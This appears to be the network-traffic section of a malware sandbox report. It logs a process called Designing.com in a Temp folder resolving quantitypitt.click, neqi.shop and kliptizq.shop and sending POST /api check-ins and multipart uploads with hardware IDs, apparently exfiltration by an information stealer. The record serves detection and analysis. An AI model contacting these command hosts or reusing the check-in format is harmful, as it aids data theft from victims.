                                                                                                                                                                            Dec 22, 2024 23:28:56.669995070 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.671057940 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.671087027 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:56.671449900 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:56.672528982 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.672646046 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:56.672684908 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.706228018 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.706453085 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.706631899 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.706732988 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.706772089 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.730092049 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.730130911 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:57.730223894 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.730482101 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:57.730496883 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.952382088 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.952600956 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.953531981 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.953540087 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.954035997 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:58.955557108 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.955687046 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:58.955693007 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:59.745860100 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:59.746149063 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:59.746361971 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:59.746484041 CET49799443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:59.746496916 CET44349799172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:00.240720034 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:00.240801096 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:00.240993023 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:00.241328001 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:00.241358995 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.468075991 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.468179941 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.469938040 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.469958067 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.470892906 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.472460985 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473541021 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473582983 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.473687887 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473722935 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.473825932 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.473898888 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474020958 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474046946 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474180937 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474205017 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474349022 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474380970 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.474395990 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474515915 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.474548101 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.519334078 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.519553900 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.519606113 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.519620895 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.567337990 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.567528963 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.567598104 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.567626953 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.611381054 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.611510992 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:01.655349970 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:01.834641933 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.735188961 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.735332012 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.735405922 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:03.741257906 CET49805443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:29:03.741331100 CET44349805172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:29:03.786247969 CET49816443192.168.2.5172.67.186.189
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 23:29:03.786371946 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:03.786609888 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:03.787003040 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:03.787034035 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.112003088 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.112090111 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:05.113836050 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:05.113851070 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.114272118 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.115902901 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:05.115936041 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:05.115998983 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.877598047 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.877832890 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.878002882 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:05.878087044 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:05.878087044 CET | 49816 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:29:05.878132105 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:05.878159046 CET | 443 | 49816 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:29:06.373569965 CET | 49823 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:06.373613119 CET | 443 | 49823 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:06.373701096 CET | 49823 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:06.374180079 CET | 49823 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:06.374192953 CET | 443 | 49823 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:11.147295952 CET | 443 | 49823 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:11.147526026 CET | 49823 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:11.147694111 CET | 49823 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:11.147761106 CET | 443 | 49823 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:11.148402929 CET | 49834 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:11.148458004 CET | 443 | 49834 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:11.148538113 CET | 49834 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:11.149008036 CET | 49834 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:11.149024963 CET | 443 | 49834 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:15.930136919 CET | 443 | 49834 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:15.930247068 CET | 49834 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:15.930304050 CET | 49834 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:15.930325031 CET | 443 | 49834 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:15.930905104 CET | 49845 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:15.930995941 CET | 443 | 49845 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:15.931098938 CET | 49845 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:15.935570002 CET | 49845 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:15.935642004 CET | 443 | 49845 | 194.58.112.174 | 192.168.2.5
Dec 22, 2024 23:29:15.935753107 CET | 49845 | 443 | 192.168.2.5 | 194.58.112.174
Dec 22, 2024 23:29:16.321561098 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:16.321583033 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:16.321670055 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:16.322149992 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:16.322159052 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:17.590656042 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:17.590806007 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:17.592938900 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:17.592950106 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:17.593353987 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:17.594911098 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:17.639331102 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.041548014 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.041698933 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.041759014 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:18.041778088 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.041862011 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.041908979 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:18.041918039 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.042068005 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.042129993 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:18.042243958 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:18.042259932 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Dec 22, 2024 23:29:18.042279005 CET | 49846 | 443 | 192.168.2.5 | 172.67.191.144
Dec 22, 2024 23:29:18.042284012 CET | 443 | 49846 | 172.67.191.144 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 23:28:12.859502077 CET | 62084 | 53 | 192.168.2.5 | 1.1.1.1
Dec 22, 2024 23:28:13.074731112 CET | 53 | 62084 | 1.1.1.1 | 192.168.2.5
Dec 22, 2024 23:28:43.426893950 CET | 65342 | 53 | 192.168.2.5 | 1.1.1.1
Dec 22, 2024 23:28:43.769505024 CET | 53 | 65342 | 1.1.1.1 | 192.168.2.5
Dec 22, 2024 23:29:05.879379034 CET | 61161 | 53 | 192.168.2.5 | 1.1.1.1
Dec 22, 2024 23:29:06.372596025 CET | 53 | 61161 | 1.1.1.1 | 192.168.2.5
Dec 22, 2024 23:29:15.938981056 CET | 60381 | 53 | 192.168.2.5 | 1.1.1.1
Dec 22, 2024 23:29:16.320489883 CET | 53 | 60381 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 22, 2024 23:28:12.859502077 CET | 192.168.2.5 | 1.1.1.1 | 0xc804 | Standard query (0) | qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:28:43.426893950 CET | 192.168.2.5 | 1.1.1.1 | 0x4c60 | Standard query (0) | quantitypitt.click | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:29:05.879379034 CET | 192.168.2.5 | 1.1.1.1 | 0xa3fc | Standard query (0) | neqi.shop | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:29:15.938981056 CET | 192.168.2.5 | 1.1.1.1 | 0x3d30 | Standard query (0) | kliptizq.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 22, 2024 23:28:13.074731112 CET | 1.1.1.1 | 192.168.2.5 | 0xc804 | Name error (3) | qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv | none | none | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:28:43.769505024 CET | 1.1.1.1 | 192.168.2.5 | 0x4c60 | No error (0) | quantitypitt.click | | 172.67.186.189 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:28:43.769505024 CET | 1.1.1.1 | 192.168.2.5 | 0x4c60 | No error (0) | quantitypitt.click | | 104.21.43.229 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:29:06.372596025 CET | 1.1.1.1 | 192.168.2.5 | 0xa3fc | No error (0) | neqi.shop | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:29:16.320489883 CET | 1.1.1.1 | 192.168.2.5 | 0x3d30 | No error (0) | kliptizq.shop | | 172.67.191.144 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:29:16.320489883 CET | 1.1.1.1 | 192.168.2.5 | 0x3d30 | No error (0) | kliptizq.shop | | 104.21.84.113 | A (IP address) | IN (0x0001) | false
• quantitypitt.click
• kliptizq.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49760 | 172.67.186.189 | 443 | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:28:45 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: quantitypitt.click
2024-12-22 22:28:45 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-22 22:28:45 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:28:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jb4o2q5ddc01bun66h9mqe4qhe; expires=Thu, 17 Apr 2025 16:15:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJhInCsSgCIdJWaPGD1JxQhJQte5wb7pv27yKcIjZjwHdmOnz7S3fD4F1h1Ys5RVJC%2Fgq1ppNseOEZ3i4IPfKM8XFwgqwC5VV7rc92yhrWpXYrb1Vj5a%2FF2FCNZI6kehCb1uIHo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638bf6eafc4337-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1598&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1827284&cwnd=222&unsent_bytes=0&cid=70625105b128e55c&ts=784&x=0"
2024-12-22 22:28:45 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-22 22:28:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.549766172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:28:46 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 78
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:28:46 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--VIKA&j=637b55279021aab33278188cfa638397
2024-12-22 22:28:47 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:28:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=rjpb2nijjbamsjt16igf08imul; expires=Thu, 17 Apr 2025 16:15:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5UMOqK7TuXbfIyauPcnGkgDge6aMXKGxHQwImReRUWKxQswJDw8Evcd4rRugQmd8oH70XqtWKu%2BAZCYi%2F4Wb9XbWKyMCTPcrk5HRfb8A5pCE4h5STpRSjahOeh%2B%2B6bJI19xhAY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638c0379bc8cc8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2066&min_rtt=2036&rtt_var=785&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=980&delivery_rate=1434184&cwnd=237&unsent_bytes=0&cid=fc69a4ae957870a5&ts=787&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49775 | 172.67.186.189 | 443 | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:28:49 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=84ORA7LFCGFL3S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12810
Host: quantitypitt.click
2024-12-22 22:28:49 UTC | 12810 | OUT | Data Raw: 2d 2d 38 34 4f 52 41 37 4c 46 43 47 46 4c 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 38 34 4f 52 41 37 4c 46 43 47 46 4c 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 34 4f 52 41 37 4c 46 43 47 46 4c 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 38 34 4f 52 41 37 4c 46 43
Data Ascii: --84ORA7LFCGFL3SContent-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--84ORA7LFCGFL3SContent-Disposition: form-data; name="pid"2--84ORA7LFCGFL3SContent-Disposition: form-data; name="lid"hRjzG3--VIKA--84ORA7LFC
2024-12-22 22:28:50 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:28:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ecp4ie2bhku20pscafvc86hsdr; expires=Thu, 17 Apr 2025 16:15:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zHpXiS7iIexzIPEhcYFzhOKhUwV1qBPTwACaFD8GCnKke50v25tL3famUhDER5Gel5s3lw1lHAvgza8CYELCZ0BNmin6BS3T4W8LKU230rEDK7EMXIx5Xy7usPe%2BQ0%2FYQht1xTw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638c11dca58c71-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1788&rtt_var=693&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13748&delivery_rate=1554018&cwnd=193&unsent_bytes=0&cid=7840e4b0176dd909&ts=1255&x=0"
2024-12-22 22:28:50 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-22 22:28:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49782 | 172.67.186.189 | 443 | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:28:51 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=LU8PHT2JI4GEGC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15052
Host: quantitypitt.click
2024-12-22 22:28:51 UTC | 15052 | OUT | Data Raw: 2d 2d 4c 55 38 50 48 54 32 4a 49 34 47 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 4c 55 38 50 48 54 32 4a 49 34 47 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 55 38 50 48 54 32 4a 49 34 47 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4c 55 38 50 48 54 32 4a 49
Data Ascii: --LU8PHT2JI4GEGCContent-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--LU8PHT2JI4GEGCContent-Disposition: form-data; name="pid"2--LU8PHT2JI4GEGCContent-Disposition: form-data; name="lid"hRjzG3--VIKA--LU8PHT2JI
2024-12-22 22:28:52 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:28:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=n1ufdrqqf203pf874ckv4anle2; expires=Thu, 17 Apr 2025 16:15:31 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuY%2FtSQ%2FZZQtUI5lwC9x4JOY00fGxwRucG8ocWEQlfuh1OijkeUiiWUR4wGQAq6YOhkmJjL9718PW4v4voc1dISdiwGYiD8K3bschZ1A9rYHGR9Z%2FpsonbOxmfMYUJcJtYDaz98%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
